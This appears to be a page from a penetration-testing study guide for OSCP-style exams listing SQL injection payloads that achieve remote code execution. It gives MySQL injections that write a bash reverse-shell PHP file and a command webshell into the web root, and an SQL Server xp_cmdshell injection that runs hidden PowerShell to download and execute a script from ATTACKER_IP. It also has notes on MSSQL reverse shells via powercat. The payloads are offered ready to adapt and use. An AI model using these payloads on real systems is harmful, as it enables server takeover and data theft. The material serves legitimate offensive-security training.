Payload for RCE

MySQL

Modify each command as per the situation before using it.

If direcotry is writebale then payload will be created.

'; SELECT '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\'"); ?>', null, null, null, null INTO OUTFILE '/var/www/html/tmp/shell.php'; -- //
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

You can confirm if /tmp folder exists or not using feroxbuster tool.

SQL Server

'; exec xp_cmdshell('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP/shell.ps1\')"') --

PostgreSQL

LogoCommand Execution with PostgreSQL Copy CommandMedium
LogoRed Teaming – Through PostgreSQL to shell | Ivan GlinkinIvan Glinkin | Information Security Expert

MSSQL

If you can log in to impacket-mssqlclient that is you have a valid login credential then run commands in that for RCE.

If above method doesn't works then try belwo method.

Use this encoded text to make a reverse shell but also make sure that Python werbserver is on at port 80. in a directory where powercat.ps1 is present as netcat is listening.

Now let's try reverse shell.

PreviousBlind SQL InjectionsNextSQLmap [Not Allowed in OSCP]

Last updated